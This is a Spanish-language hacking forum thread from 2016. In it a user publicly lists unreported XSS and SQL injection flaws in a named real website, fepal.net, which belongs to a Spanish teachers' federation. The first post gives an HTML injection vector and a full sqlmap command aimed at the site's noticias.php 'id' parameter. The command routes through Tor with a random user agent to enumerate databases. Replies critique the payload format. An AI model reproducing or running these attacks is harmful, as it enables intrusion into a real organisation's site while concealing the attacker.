[SQLi , XSS] www.fepal.net

Iniciado por rreedd, Marzo 05, 2016, 09:37:52 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Marzo 05, 2016, 09:37:52 PM Ultima modificación: Marzo 06, 2016, 08:28:17 AM por EPSILON
Hola !!!
Bienvenido a mi post

RREEDD

Sitio :You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Descripción del sitio:  Federación Española de Asociación de Profesores de Audición y Lenguaje.

Lista de Vulnerabilidades.

  • [XSS] Inyección en URL .
       
        Url del sitio :You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
        Vector : <h1>underc0de</h1>
        xploit : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login<h1>underc0de</h1>&pg=1
        Reportado: NO
        Autor: RREEDD


  • [SQLi] Inyección en URL.
       
        Url del sitio :You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
        Inyeccion :  You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login -u "www.fepal.net/noticias.php?id=1&pg=1" -p "id"  --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --time-sec 15
        Herramienta : SQLMAP
        Reportado: NO
        Autor: RREEDD
Saludos desde Chile
Marzo 06, 2016, 08:50:58 AM #1
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.
Marzo 06, 2016, 10:35:16 AM #2
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.

Además de eso, cuando buscas una XSS tienes que buscar ejecutar código javascript, en muchas ocasiones te permite poner una etiqueta html, pero no se puede llegar a ejecutar un código javascript.

Éste Payload estaría mejor: "You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login"
RollthBuen hacker mejor You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Marzo 06, 2016, 12:05:45 PM #3
RREEDD
Hola!!
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.
Gracias por la aclaración, porque mi intención al poner el payload de sqlmap era demostrar que era vulnerable, así que lo tendre en mente para la próxima.

Muchas gracias a todos por comentar.

Saludos desde Chile.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario